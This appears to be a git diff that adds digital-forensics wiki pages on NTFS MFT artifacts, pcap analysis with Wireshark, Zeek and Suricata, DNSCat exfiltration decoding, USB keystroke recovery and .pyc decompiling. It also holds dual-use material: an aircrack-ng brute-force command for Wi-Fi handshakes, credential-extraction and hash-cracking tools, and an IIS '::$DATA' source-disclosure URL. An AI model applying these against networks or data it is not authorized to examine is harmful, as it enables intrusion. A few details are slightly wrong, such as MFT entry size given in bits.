0 | Contains one base file record for each file and folder on an NTFS volume. If the allocation information for a file or folder is too large to fit within a single record, other file records are allocated as well. | +| Master file table 2 | $MftMirr | 1 | A duplicate image of the first four records of the MFT. This file guarantees access to the MFT in case of a single-sector failure. | +| Log file | $LogFile | 2 | Contains a list of transaction steps used for NTFS recoverability. Log file size depends on the volume size and can be as large as 4 MB. It is used by Windows NT/2000 to restore consistency to NTFS after a system failure. | +| Volume | $Volume | 3 | Contains information about the volume, such as the volume label and the volume version. | +| Attribute definitions | $AttrDef | 4 | A table of attribute names, numbers, and descriptions. | +| Root file name index | $ | 5 | The root folder. | +| Cluster bitmap | $Bitmap | 6 | A representation of the volume showing which clusters are in use. | +| Boot sector | $Boot | 7 | Includes the BPB used to mount the volume and additional bootstrap loader code used if the volume is bootable. | +| Bad cluster file | $BadClus | 8 | Contains bad clusters for the volume. | +| Security file | $Secure | 9 | Contains unique security descriptors for all files within a volume. | +| Upcase table | $Upcase | 10 | Converts lowercase characters to matching Unicode uppercase characters. | +| NTFS extension file | $Extend | 11 | Used for various optional extensions such as quotas, reparse point data, and object identifiers. | +| | | 12-15 | Reserved for future use. | +| Quota management file | $Quota | 24 | Contains user assigned quota limits on the volume space. | +| Object Id file | $ObjId | 25 | Contains file object IDs. | +| Reparse point file | $Reparse | 26 | This file contains information about files and folders on the volume include reparse point data. | + +### Each entry of the MFT looks like the following: + +![](../../../.gitbook/assets/image%20%28483%29.png) + +Note how each entry starts with "FILE". Each entry occupies 1024 bits. So after 1024 bit from the start of a MFT entry you will find the next one. + +Using the [**Active Disk Editor**](https://www.disk-editor.org/index.html) it's very easy to inspect the entry of a file in the MFT. Just right click on the file and then click "Inspect File Record" + +![](../../../.gitbook/assets/image%20%28493%29.png) + +![](../../../.gitbook/assets/image%20%28482%29.png) + +Checking the **"In use**" flag it's very easy to know if a file was deleted \(a value of **0x0 means deleted**\). + +![](../../../.gitbook/assets/image%20%28520%29.png) + +It's also possible to recover deleted files using FTKImager: + +![](../../../.gitbook/assets/image%20%28490%29.png) + +### MFT Attributes + +Each MFT entry has several attributes as the following image indicates: + +![](../../../.gitbook/assets/image%20%28495%29.png) + +Each attribute indicates some entry information identified by the type: + +| Type Identifier | Name | Description | +| :--- | :--- | :--- | +| 16 | $STANDARD\_INFORMATION | General information, such as flags; the last accessed, written, and created times; and the owner and security ID. | +| 32 | $ATTRIBUTE\_LIST | List where other attributes for file can be found. | +| 48 | $FILE\_NAME | File name, in Unicode, and the last accessed, written, and created times. | +| 64 | $VOLUME\_VERSION | Volume information. Exists only in version 1.2 \(Windows NT\). | +| 64 | $OBJECT\_ID | A 16-byte unique identifier for the file or directory. Exists only in versions 3.0+ and after \(Windows 2000+\). | +| 80 | $SECURITY\_ DESCRIPTOR | The access control and security properties of the file. | +| 96 | $VOLUME\_NAME | Volume name. | +| 112 | $VOLUME\_ INFORMATION | File system version and other flags. | +| 128 | $DATA | File contents. | +| 144 | $INDEX\_ROOT | Root node of an index tree. | +| 160 | $INDEX\_ALLOCATION | Nodes of an index tree rooted in $INDEX\_ROOT attribute. | +| 176 | $BITMAP | A bitmap for the $MFT file and for indexes. | +| 192 | $SYMBOLIC\_LINK | Soft link information. Exists only in version 1.2 \(Windows NT\). | +| 192 | $REPARSE\_POINT | Contains data about a reparse point, which is used as a soft link in version 3.0+ \(Windows 2000+\). | +| 208 | $EA\_INFORMATION | Used for backward compatibility with OS/2 applications \(HPFS\). | +| 224 | $EA | Used for backward compatibility with OS/2 applications \(HPFS\). | +| 256 | $LOGGED\_UTILITY\_STREAM | Contains keys and information about encrypted attributes in version 3.0+ \(Windows 2000+\). | + +For example the **type 48 \(0x30\)** identifies the **file name**: + +![](../../../.gitbook/assets/image%20%28515%29.png) + +It is also useful to understand that **these attributes can be resident** \(meaning, they exist within a given MFT record\) or **nonresident** \(meaning, they exist outside a given MFT record, elsewhere on the disk, and are simply referenced within the record\). For example, if the attribute **$Data is resident**, these means that the **whole file is saved in the MFT**, if it's nonresident, then the content of the file is in other part of the file system. + +Some interesting attributes: + +* [$STANDARD\_INFORMATION](https://flatcap.org/linux-ntfs/ntfs/attributes/standard_information.html) \(among others\): + * Creation date + * Modification date + * Access date + * MFT update date + * DOS File permissions +* [$FILE\_NAME](https://flatcap.org/linux-ntfs/ntfs/attributes/file_name.html) \(among others\): + * File name + * Creation date + * Modification date + * Access date + * MFT update date + * Allocated size + * Real size + * [File reference](https://flatcap.org/linux-ntfs/ntfs/concepts/file_reference.html) to the parent directory. +* [$Data](https://flatcap.org/linux-ntfs/ntfs/attributes/data.html) \(among others\): + * Contains the file's data or the indication of the sectors where the data resides. In the following example the attribute data is not resident so the attribute gives information about the sectors where the data resides. + +![](../../../.gitbook/assets/image%20%28507%29%20%281%29%20%281%29.png) + +![](../../../.gitbook/assets/image%20%28512%29.png) + +### NTFS timestamps + +![](../../../.gitbook/assets/image%20%28521%29.png) + +Another useful tool to analyze the MFT is [**MFT2csv**](https://github.com/jschicht/Mft2Csv). +This program will extract all the MFT data and present it in CSV format. It can also be used to dump the files. + +![](../../../.gitbook/assets/image%20%28514%29.png) + +### $LOGFILE + +The file **`$LOGFILE`** contains **logs** about the **actions** that have been **performed** **to** **files**. It also **saves** the **action** it would need to perform in case of a **redo** and the action needed to **go back** to the **previous** **state**. +These logs are useful for the MFT to rebuild the file system in case some kind of error happened. + +The maximum file size of this file is **65536KB**. + +In order to inspect the `$LOGFILE` you need to extract it and inspect the `$MFT` previously with [**MFT2csv**](https://github.com/jschicht/Mft2Csv). +Then run [**LogFileParser**](https://github.com/jschicht/LogFileParser) against this file and selecting the exported `$LOGFILE` file and the CVS of the inspection of the `$MFT` you will obtain a csv file with the logs of the file system activity recorded by the `$LOGFILE` log. + +![](../../../.gitbook/assets/image%20%28519%29.png) + +Filtering by filenames you can see **all the actions performed against a file**: + +![](../../../.gitbook/assets/image%20%28513%29.png) + +### $USNJnrl + +The file `$EXTEND/$USNJnrl/$J` is and alternate data stream of the file `$EXTEND$USNJnrl` . This artifact contains a **registry of changes produced inside the NTFS volume with more detail than `$LOGFILE`**. + +To inspect this file you can use the tool [**UsnJrnl2csv**](https://github.com/jschicht/UsnJrnl2Csv). + +Filtering by the filename it's possible to see **all the actions performed against a file**. Also you can find the `MFTReference` of the parent folder. Then, looking for that `MFTReference` you can find i**nformation of the parent folder.** + +![](../../../.gitbook/assets/image%20%28517%29.png) + +### $I30 + +Every **directory** in the file system contains an **`$I30`** **attribute** that must be maintained whenever there are changes to the directory's contents. When files or folders are removed from the directory, the **`$I30`** index records are re-arranged accordingly. However, **re-arranging of the index records may leave remnants of the deleted file/folder entry within the slack space**. This can be useful in forensics analysis for identifying files that may have existed on the drive. + +You can get the `$I30` file of a directory from the **FTK Imager** and inspect it with the tool [Indx2Csv](https://github.com/jschicht/Indx2Csv). + +![](../../../.gitbook/assets/image%20%28527%29.png) + +With this data you can find **information about the file changes performed inside the folder** but note that the deletion time of a file isn't saved inside this logs. However, you can see that **last modified date** of the **`$I30` file**, and if the **last action performed** over the directory is the **deletion** of a file, the times may be the same. + +### $Bitmap + +The **`$BitMap`** is a special file within the NTFS file system. This file keeps **track of all of the used and unused clusters** on an NTFS volume. When a file takes up space on the NTFS volume the location is uses is marked out in the `$BitMap`. + +![](../../../.gitbook/assets/image%20%28526%29.png) + +### ADS \(Alternate Data Stream\) + +Alternate data streams allow files to contain more than one stream of data. Every file has at least one data stream. In Windows, this default data stream is called `:$DATA`. +In this [page you can see different ways to create/access/discover alternate data streams](../../../windows/basic-cmd-for-pentesters.md#alternate-data-streams-cheatsheet-ads-alternate-data-stream) from the console. In the past this cause a vulnerability in IIS as people was able to access the source code of a page by accessing the `:$DATA` stream like `http://www.alternate-data-streams.com/default.asp::$DATA`. + +Using the tool [**AlternateStreamView**](https://www.nirsoft.net/utils/alternate_data_streams.html) you can search and export all the files with some ADS. + +![](../../../.gitbook/assets/image%20%28528%29.png) + +Using the FTK imager and double clicking in a file with ADS you can **access the ADS data**: + +![](../../../.gitbook/assets/image%20%28529%29.png) + +If you find an ADS called **`Zone.Identifier`** \(see previous image\) this usually contains **information about how was the file downloaded**. There would be a "ZoneId" field with the following info: + +* Zone ID = 0 -> Mycomputer +* Zone ID = 1 -> Intranet +* Zone ID = 2 -> Trusted +* Zone ID = 3 -> Internet +* Zone ID = 4 -> Unstrusted + +Moreover, different software may store additional information: + +| Software | Info | +| :--- | :--- | +| Google Chrome, Opera, Vivaldi, | ZoneId=3, ReferrerUrl, HostUrl | +| Microsoft Edge | ZoneId=3, LastWriterPackageFamilyName=Microsoft.MicrosoftEdge\_8wekyb3d8bbwe | +| Firefox, Tor browser, Outlook2016, Thunderbird, Windows Mail, Skype | ZoneId=3 | +| μTorrent | ZoneId=3, HostUrl=about:internet | + diff --git a/forensics/basic-forensic-methodology/pcap-inspection/README.md b/forensics/basic-forensic-methodology/pcap-inspection/README.md new file mode 100644 index 00000000000..dc35685bf5e --- /dev/null +++ b/forensics/basic-forensic-methodology/pcap-inspection/README.md @@ -0,0 +1,220 @@ +# Pcap Inspection + +{% hint style="info" %} +A note about **PCAP** vs **PCAPNG**: there are two versions of the PCAP file format; **PCAPNG is newer and not supported by all tools**. You may need to convert a file from PCAPNG to PCAP using Wireshark or another compatible tool, in order to work with it in some other tools. +{% endhint %} + +## Online tools for pcaps + +* If the header of your pcap is **broken** you should try to **fix** it using: [http://f00l.de/hacking/**pcapfix.php**](http://f00l.de/hacking/pcapfix.php)\*\*\*\* +* Extract **information** and search for **malware** inside a pcap in [**PacketTotal**](https://packettotal.com/)\*\*\*\* +* Search for **malicious activity** using [**www.virustotal.com**](https://www.virustotal.com/) and [**www.hybrid-analysis.com**](https://www.hybrid-analysis.com/)\*\*\*\* + +## Extract Information + +The following tools are useful to extract statistic, files... + +### Wireshark + +{% hint style="info" %} +**If you are going to analyze a PCAP you basically must to know how to use Wireshark** +{% endhint %} + +You can find some Wireshark trick in: + +{% page-ref page="wireshark-tricks.md" %} + +### Xplico Framework + +\*\*\*\*[**Xplico** ](https://github.com/xplico/xplico)_\(only linux\)_ ****can **analyze** a **pcap** and extract information from it. For example, from a pcap file Xplico extracts each email \(POP, IMAP, and SMTP protocols\), all HTTP contents, each VoIP call \(SIP\), FTP, TFTP, and so on. + +#### Install + +```bash +sudo bash -c 'echo "deb http://repo.xplico.org/ $(lsb_release -s -c) main" /etc/apt/sources.list' +sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys 791C25CE +sudo apt-get update +sudo apt-get install xplico +``` + +#### Run + +```text +/etc/init.d/apache2 restart +/etc/init.d/xplico start +``` + +Access to _**127.0.0.1:9876**_ with credentials _**xplico:xplico**_ + +Then create a **new case**, create a **new session** inside the case and **upload the pcap** file. + +### NetworkMiner + +Like Xplico it is a tool to **analyze and extract objects from pcaps**. It has a free edition that you can **download** [**here**](https://www.netresec.com/?page=NetworkMiner). It works with **Windows**. +This tool is also useful to get **other information analysed** from the packets in order to be able to know what was happening there in a **quick** way. + +### NetWitness Investigator + +You can download [**NetWitness Investigator from here**](https://www.rsa.com/en-us/contact-us/netwitness-investigator-freeware) **\(It works in Windows\)**. +This is another useful tool that **analyse the packets** and sort the information in a useful way to **know what is happening inside**. + +![](../../../.gitbook/assets/image%20%28567%29%20%281%29%20%281%29.png) + +### [BruteShark](https://github.com/odedshimon/BruteShark) + +* Extracting and encoding usernames and passwords \(HTTP, FTP, Telnet, IMAP, SMTP...\) +* Extract authentication hashes and crack them using Hashcat \(Kerberos, NTLM, CRAM-MD5, HTTP-Digest...\) +* Build visual network diagram \(Network nodes & users\) +* Extract DNS queries +* Reconstruct all TCP & UDP Sessions +* File Carving + +### Capinfos + +```text +capinfos capture.pcap +``` + +### Ngrep + +If you are **looking** for **something** inside the pcap you can use **ngrep**. And example using the main filters: + +```bash +ngrep -I packets.pcap "^GET" "port 80 and tcp and host 192.168 and dst host 192.168 and src host 192.168" +``` + +### Carving + +Using common carving techniques can be useful to extract files and information from the pcap: + +{% page-ref page="../partitions-file-systems-carving/file-data-carving-recovery-tools.md" %} + +### Capturing credentials + +You can us tools like [https://github.com/lgandx/PCredz](https://github.com/lgandx/PCredz) to parse credentials from a pcap or a live interface. + +## Check Exploits/Malware + +### Suricata + +#### Install and setup + +```text +apt-get install suricata +apt-get install oinkmaster +echo "url = http://rules.emergingthreats.net/open/suricata/emerging.rules.tar.gz" >> /etc/oinkmaster.conf +oinkmaster -C /etc/oinkmaster.conf -o /etc/suricata/rules +``` + +#### Check pcap + +```text +suricata -r packets.pcap -c /etc/suricata/suricata.yaml -k none -v -l log +``` + +### YaraPcap + +\*\*\*\*[**YaraPCAP**](https://github.com/kevthehermit/YaraPcap) is a tool that + +* Reads a PCAP File and Extracts Http Streams. +* gzip deflates any compressed streams +* Scans every file with yara +* writes a report.txt +* optionally saves matching files to a Dir + +### Malware Analysis + +Check if you can find any fingerprint of a known malware: + +{% page-ref page="../malware-analysis.md" %} + +## Zeek + +> Zeek is a passive, open-source network traffic analyzer. Many operators use Zeek as a network security monitor \(NSM\) to support investigations of suspicious or malicious activity. Zeek also supports a wide range of traffic analysis tasks beyond the security domain, including performance measurement and troubleshooting. + +Basically, logs created by `zeek` aren't **pcaps**. Therefore you will need to use **other tools** to analyse the logs where the **information** about the pcaps are. + +### Connections Info + +```bash +#Get info about longest connections (add "grep udp" to see only udp traffic) +#The longest connection might be of malware (constant reverse shell?) +cat conn.log | zeek-cut id.orig_h id.orig_p id.resp_h id.resp_p proto service duration | sort -nrk 7 | head -n 10 + +10.55.100.100 49778 65.52.108.225 443 tcp - 86222.365445 +10.55.100.107 56099 111.221.29.113 443 tcp - 86220.126151 +10.55.100.110 60168 40.77.229.82 443 tcp - 86160.119664 + + +#Improve the metrics by summing up the total duration time for connections that have the same destination IP and Port. +cat conn.log | zeek-cut id.orig_h id.resp_h id.resp_p proto duration | awk 'BEGIN{ FS="\t" } { arr[$1 FS $2 FS $3 FS $4] += $5 } END{ for (key in arr) printf "%s%s%s\n", key, FS, arr[key] }' | sort -nrk 5 | head -n 10 + +10.55.100.100 65.52.108.225 443 tcp 86222.4 +10.55.100.107 111.221.29.113 443 tcp 86220.1 +10.55.100.110 40.77.229.82 443 tcp 86160.1 + +#Get the number of connectionssummed up per each line +cat conn.log | zeek-cut id.orig_h id.resp_h duration | awk 'BEGIN{ FS="\t" } { arr[$1 FS $2] += $3; count[$1 FS $2] += 1 } END{ for (key in arr) printf "%s%s%s%s%s\n", key, FS, count[key], FS, arr[key] }' | sort -nrk 4 | head -n 10 + +10.55.100.100 65.52.108.225 1 86222.4 +10.55.100.107 111.221.29.113 1 86220.1 +10.55.100.110 40.77.229.82 134 86160.1 + +#Check if any IP is connecting to 1.1.1.1 +cat conn.log | zeek-cut id.orig_h id.resp_h id.resp_p proto service | grep '1.1.1.1' | sort | uniq -c + +#Get number of connections per source IP, dest IP and dest Port +cat conn.log | zeek-cut id.orig_h id.resp_h id.resp_p proto | awk 'BEGIN{ FS="\t" } { arr[$1 FS $2 FS $3 FS $4] += 1 } END{ for (key in arr) printf "%s%s%s\n", key, FS, arr[key] }' | sort -nrk 5 | head -n 10 + + +### RITA +#Something similar can be done with the tool rita +rita show-long-connections -H --limit 10 zeek_logs + ++---------------+----------------+--------------------------+----------------+ +| SOURCE IP | DESTINATION IP | DSTPORT:PROTOCOL:SERVICE | DURATION | ++---------------+----------------+--------------------------+----------------+ +| 10.55.100.100 | 65.52.108.225 | 443:tcp:- | 23h57m2.3655s | +| 10.55.100.107 | 111.221.29.113 | 443:tcp:- | 23h57m0.1262s | +| 10.55.100.110 | 40.77.229.82 | 443:tcp:- | 23h56m0.1197s | + +#Get connections info from rita +rita show-beacons zeek_logs | head -n 10 +Score,Source IP,Destination IP,Connections,Avg Bytes,Intvl Range,Size Range,Top Intvl,Top Size,Top Intvl Count,Top Size Count,Intvl Skew,Size Skew,Intvl Dispersion,Size Dispersion +1,192.168.88.2,165.227.88.15,108858,197,860,182,1,89,53341,108319,0,0,0,0 +1,10.55.100.111,165.227.216.194,20054,92,29,52,1,52,7774,20053,0,0,0,0 +0.838,10.55.200.10,205.251.194.64,210,69,29398,4,300,70,109,205,0,0,0,0 +``` + +### DNS info + +```bash +#Get info about each DNS request performed +cat dns.log | zeek-cut -c id.orig_h query qtype_name answers + +#Get number of times each domain was requestedand get top 10 +cat dns.log | zeek-cut query | sort | uniq | rev | cut -d '.' -f 1-2 | rev | sort | uniq -c | sort -nr | head -n 10 + +#Get all the IPs +cat dns.log | zeek-cut id.orig_h query | grep 'example\.com' | cut -f 1 | sort | uniq -c + +#Sort the most common dnsrecord request (should be A) +cat dns.log | zeek-cut qtype_name | sort | uniq -c | sort -nr + +#See top DNS domain requested with rita +rita show-exploded-dns -H --limit 10 zeek_logs + + + +``` + +## Other pcap analysis tricks + +{% page-ref page="dnscat-exfiltration.md" %} + +{% page-ref page="wifi-pcap-analysis.md" %} + +{% page-ref page="usb-keystrokes.md" %} + + + diff --git a/forensics/basic-forensic-methodology/pcap-inspection/dnscat-exfiltration.md b/forensics/basic-forensic-methodology/pcap-inspection/dnscat-exfiltration.md new file mode 100644 index 00000000000..6b30aa547f5 --- /dev/null +++ b/forensics/basic-forensic-methodology/pcap-inspection/dnscat-exfiltration.md @@ -0,0 +1,28 @@ +# DNSCat pcap analysis + +If you have pcap with data being **exfiltrated by DNSCat** \(without using encryption\), you can find the exfiltrated content. + +You only need to know that the **first 9 bytes** are not real data but are related to the **C&C communication**: + +```python +from scapy.all import rdpcap, DNSQR, DNSRR +import struct + +f = "" +last = "" +for p in rdpcap('ch21.pcap'): + if p.haslayer(DNSQR) and not p.haslayer(DNSRR): + + qry = p[DNSQR].qname.replace(".jz-n-bs.local.","").strip().split(".") + qry = ''.join(_.decode('hex') for _ in qry)[9:] + if last != qry: + print(qry) + f += qry + last = qry + +#print(f) +``` + +For more information: [https://github.com/jrmdev/ctf-writeups/tree/master/bsidessf-2017/dnscap](https://github.com/jrmdev/ctf-writeups/tree/master/bsidessf-2017/dnscap) +[https://github.com/iagox86/dnscat2/blob/master/doc/protocol.md](https://github.com/iagox86/dnscat2/blob/master/doc/protocol.md) + diff --git a/forensics/basic-forensic-methodology/pcap-inspection/usb-keyboard-pcap-analysis.md b/forensics/basic-forensic-methodology/pcap-inspection/usb-keyboard-pcap-analysis.md new file mode 100644 index 00000000000..cc0aefa2816 --- /dev/null +++ b/forensics/basic-forensic-methodology/pcap-inspection/usb-keyboard-pcap-analysis.md @@ -0,0 +1,13 @@ +# USB Keyboard pcap analysis + +If you have a pcap of a USB connection with a lot of Interruptions probably it is a USB Keyboard connection. + +A wireshark filter like this could be useful: `usb.transfer_type == 0x01 and frame.len == 35 and !(usb.capdata == 00:00:00:00:00:00:00:00)` + +It could be important to know that the data that starts with "02" is pressed using shift. + +You can read more information and find some scripts about how to analyse this in: + +* [https://medium.com/@ali.bawazeeer/kaizen-ctf-2018-reverse-engineer-usb-keystrok-from-pcap-file-2412351679f4](https://medium.com/@ali.bawazeeer/kaizen-ctf-2018-reverse-engineer-usb-keystrok-from-pcap-file-2412351679f4) +* [https://github.com/tanc7/HacktheBox\_Deadly\_Arthropod\_Writeup](https://github.com/tanc7/HacktheBox_Deadly_Arthropod_Writeup) + diff --git a/forensics/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md b/forensics/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md new file mode 100644 index 00000000000..7202c53cdd0 --- /dev/null +++ b/forensics/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md @@ -0,0 +1,20 @@ +# USB Keystrokes + +If you have a pcap containing the communication via USB of a keyboard like the following one: + +![](../../../.gitbook/assets/image%20%28567%29.png) + +You can use the tool [**ctf-usb-keyboard-parser**](https://github.com/carlospolop-forks/ctf-usb-keyboard-parser) to get what was written in the communication: + +```bash +tshark -r ./usb.pcap -Y 'usb.capdata && usb.data_len == 8' -T fields -e usb.capdata | sed 's/../:&/g2' > keystrokes.txt +python3 usbkeyboard.py ./keystrokes.txt +``` + + + +You can read more information and find some scripts about how to analyse this in: + +* [https://medium.com/@ali.bawazeeer/kaizen-ctf-2018-reverse-engineer-usb-keystrok-from-pcap-file-2412351679f4](https://medium.com/@ali.bawazeeer/kaizen-ctf-2018-reverse-engineer-usb-keystrok-from-pcap-file-2412351679f4) +* [https://github.com/tanc7/HacktheBox\_Deadly\_Arthropod\_Writeup](https://github.com/tanc7/HacktheBox_Deadly_Arthropod_Writeup) + diff --git a/forensics/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md b/forensics/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md new file mode 100644 index 00000000000..12090a34375 --- /dev/null +++ b/forensics/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md @@ -0,0 +1,42 @@ +# Wifi Pcap Analysis + +## Check BSSIDs + +When you receive a capture whose principal traffic is Wifi using WireShark you can start investigating all the SSIDs of the capture with _Wireless --> WLAN Traffic_: + +![](../../../.gitbook/assets/image%20%28426%29.png) + +![](../../../.gitbook/assets/image%20%28429%29.png) + +### Brute Force + +One of the columns of that screen indicates if **any authentication was found inside the pcap**. If that is the case you can try to Brute force it using `aircrack-ng`: + +```bash +aircrack-ng -w pwds-file.txt -b file.pcap +``` + +## Data in Beacons / Side Channel + +If you suspect that **data is being leaked inside beacons of a Wifi network** you can check the beacons of the network using a filter like the following one: `wlan contains `, or `wlan.ssid == "NAMEofNETWORK"` search inside the filtered packets for suspicious strings. + +## Find unknown MAC addresses in a Wiffi network + +The following link will be useful to find the **machines sending data inside a Wifi Network**: + +* `((wlan.ta == e8:de:27:16:70:c9) && !(wlan.fc == 0x8000)) && !(wlan.fc.type_subtype == 0x0005) && !(wlan.fc.type_subtype ==0x0004) && !(wlan.addr==ff:ff:ff:ff:ff:ff) && wlan.fc.type==2` + +If you already know **MAC addresses you can remove them from the output** adding checks like this one: `&& !(wlan.addr==5c:51:88:31:a0:3b)` + +Once you have detected **unknown MAC** addresses communicating inside the network you can use **filters** like the following one: `wlan.addr== && (ftp || http || ssh || telnet)` to filter its traffic. Note that ftp/http/ssh/telnet filters are useful if you have decrypted the traffic. + +## Decrypt Traffic + +Edit --> Preferences --> Protocols --> IEEE 802.11--> Edit + +![](../../../.gitbook/assets/image%20%28427%29.png) + + + + + diff --git a/forensics/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md b/forensics/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md new file mode 100644 index 00000000000..3b3c797112a --- /dev/null +++ b/forensics/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md @@ -0,0 +1,159 @@ +# Wireshark tricks + +## Improve your Wireshark skills + +### Tutorials + +The following tutorials are amazing to learn some cool basic tricks: + +* [https://unit42.paloaltonetworks.com/unit42-customizing-wireshark-changing-column-display/](https://unit42.paloaltonetworks.com/unit42-customizing-wireshark-changing-column-display/) +* [https://unit42.paloaltonetworks.com/using-wireshark-display-filter-expressions/](https://unit42.paloaltonetworks.com/using-wireshark-display-filter-expressions/) +* [https://unit42.paloaltonetworks.com/using-wireshark-identifying-hosts-and-users/](https://unit42.paloaltonetworks.com/using-wireshark-identifying-hosts-and-users/) +* [https://unit42.paloaltonetworks.com/using-wireshark-exporting-objects-from-a-pcap/](https://unit42.paloaltonetworks.com/using-wireshark-exporting-objects-from-a-pcap/) + +### Analysed Information + +#### Expert Information + +Clicking on _**Analyze** --> **Expert Information**_ you will have an **overview** of what is happening in the packets **analised**: + +![](../../../.gitbook/assets/image%20%28571%29.png) + +#### Resolved Addresses + +Under _**Statistics --> Resolved Addresses**_ you can find several **information** that was "**resolved**" by wireshark like port/transport to protocol, mac to manufacturer... +This is interesting to know what is implicated in the communication. + +![](../../../.gitbook/assets/image%20%28574%29.png) + +#### Protocol Hierarchy + +Under _**Statistics --> Protocol Hierarchy**_ you can find the **protocols** **involved** in the communication and data about them. + +![](../../../.gitbook/assets/image%20%28576%29.png) + +#### Conversations + +Under _**Statistics --> Conversations**_ you can find a **summary of the conversations** in the communication and data about them. + +![](../../../.gitbook/assets/image%20%28572%29.png) + +#### **Endpoints** + +Under _**Statistics --> Endpoints**_ you can find a **summary of the endpoints** in the communication and data about each of them. + +![](../../../.gitbook/assets/image%20%28575%29.png) + +#### DNS info + +Under _**Statistics --> DNS**_ you can find statistics about the DNS request captured. + +![](../../../.gitbook/assets/image%20%28577%29.png) + +#### I/O Graph + +Under _**Statistics --> I/O Graph**_ you can find a **graph of the communication.** + +![](../../../.gitbook/assets/image%20%28573%29.png) + +### Filters + +Here you can find wireshark filter depending on the protocol: [https://www.wireshark.org/docs/dfref/](https://www.wireshark.org/docs/dfref/) +Other interesting filters: + +* `(http.request or ssl.handshake.type == 1) and !(udp.port eq 1900)` + * HTTP and initial HTTPS traffic +* `(http.request or ssl.handshake.type == 1 or tcp.flags eq 0x0002) and !(udp.port eq 1900)` + * HTTP and initial HTTPS traffic + TCP SYN +* `(http.request or ssl.handshake.type == 1 or tcp.flags eq 0x0002 or dns) and !(udp.port eq 1900)` + * HTTP and initial HTTPS traffic + TCP SYN + DNS requests + +### Search + +If you want to **search** for **content** inside the **packets** of the sessions press _CTRL+f_ +You can add new layers to the main information bar _\(No., Time, Source...\)_ pressing _right bottom_ and _Edit Column_ + +Practice: [https://www.malware-traffic-analysis.net/](https://www.malware-traffic-analysis.net/) + +## Identifying Domains + +You can add a column that show the Host HTTP header: + +![](../../../.gitbook/assets/image%20%28405%29.png) + +And a column that add the Server name from an initiating HTTPS connection \(**ssl.handshake.type == 1**\): + +![](../../../.gitbook/assets/image%20%28408%29.png) + +## Identifying local hostnames + +### From DHCP + +In current Wireshark instead of `bootp` you need to search for `DHCP` + +![](../../../.gitbook/assets/image%20%28409%29.png) + +### From NBNS + +![](../../../.gitbook/assets/image%20%28406%29.png) + + + + + +## Decrypting TLS + +### Decrypting https traffic with server private key + +_edit>preference>protocol>ssl>_ + +![](../../../.gitbook/assets/image%20%28263%29.png) + +Press _Edit_ and add all the data of the server and the private key \(_IP, Port, Protocol, Key file and password_\) + +### Decrypting https traffic with symmetric session keys + +It turns out that Firefox and Chrome both support logging the symmetric session key used to encrypt TLS traffic to a file. You can then point Wireshark at said file and presto! decrypted TLS traffic. More in: [https://redflagsecurity.net/2019/03/10/decrypting-tls-wireshark/](https://redflagsecurity.net/2019/03/10/decrypting-tls-wireshark/) +To detect this search inside the environment for to variable `SSLKEYLOGFILE` + +A file of shared keys will looks like this: + +![](../../../.gitbook/assets/image%20%2862%29.png) + +To import this in wireshark go to _edit>preference>protocol>ssl>_ and import it in \(Pre\)-Master-Secret log filename: + +![](../../../.gitbook/assets/image%20%28191%29.png) + +## ADB communication + +Extract an APK from an ADB communication where the APK was sent: + +```python +from scapy.all import * + +pcap = rdpcap("final2.pcapng") + +def rm_data(data): + splitted = data.split(b"DATA") + if len(splitted) == 1: + return data + else: + return splitted[0]+splitted[1][4:] + +all_bytes = b"" +for pkt in pcap: + if Raw in pkt: + a = pkt[Raw] + if b"WRTE" == bytes(a)[:4]: + all_bytes += rm_data(bytes(a)[24:]) + else: + all_bytes += rm_data(bytes(a)) +print(all_bytes) + +f = open('all_bytes.data', 'w+b') +f.write(all_bytes) +f.close() +``` + + + diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md new file mode 100644 index 00000000000..cefcc600e34 --- /dev/null +++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md @@ -0,0 +1,63 @@ +# .pyc + +## Getting the code + +For the .pyc binaries \("compiled" python\) you should start trying to **extract** the **original** **python** **code**: + +```bash +uncompyle6 binary.pyc > decompiled.py +``` + +**Be sure** that the binary has the **extension** "**.pyc**" \(if not, uncompyle6 is not going to work\) + +After extracting it, it will be more easy to analyze. + +## Analyzing python assembly + +If you weren't able to extract the python "original" code following the previous steps, then you can try to **extract** the **assembly** \(but i**t isn't very descriptive**, so **try** to extract **again** the original code\). + +In [here](https://bits.theorem.co/protecting-a-python-codebase/) I found a very simple code to **dissasemble** the _.pyc_ binary \(good luck understanding the code flow\). If the _.pyc_ is from python2, use python2: + +```bash +>>> import dis +>>> import marshal +>>> import struct +>>> import imp +>>> +>>> with open('hello.pyc', 'r') as f: # Read the binary file +... magic = f.read(4) +... timestamp = f.read(4) +... code = f.read() +... +>>> +>>> # Unpack the structure content and un-marshal the code +>>> magic = struct.unpack('>> timestamp = struct.unpack('>> code = marshal.loads(code) +>>> magic, timestamp, code +((62211,), (1425911959,), at 0x7fd54f90d5b0, file "hello.py", line 1>) +>>> +>>> # Verify if magic number corresponds with the current python version +>>> struct.unpack('>> +>>> # Disassemble the code object +>>> dis.disassemble(code) + 1 0 LOAD_CONST 0 () + 3 MAKE_FUNCTION 0 + 6 STORE_NAME 0 (hello_world) + 9 LOAD_CONST 1 (None) + 12 RETURN_VALUE +>>> +>>> # Also disassemble that const being loaded (our function) +>>> dis.disassemble(code.co_consts[0]) + 2 0 LOAD_CONST 1 ('Hello {0}') + 3 LOAD_ATTR 0 (format) + 6 LOAD_FAST 0 (name) + 9 CALL_FUNCTION 1 + 12 PRINT_ITEM + 13 PRINT_NEWLINE + 14 LOAD_CONST 0 (None) + 17 RETURN_VALUE +``` + diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/README.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/README.md new file mode 100644 index 00000000000..ec620b4af78 --- /dev/null +++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/README.md @@ -0,0 +1,24 @@ +# Specific Software/File-Type Tricks + +Here you can find interesting tricks for specific file-types and/or software: + +{% page-ref 